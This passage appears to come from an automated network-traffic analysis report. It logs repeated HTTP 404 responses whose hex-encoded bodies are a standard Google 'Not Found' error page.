31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 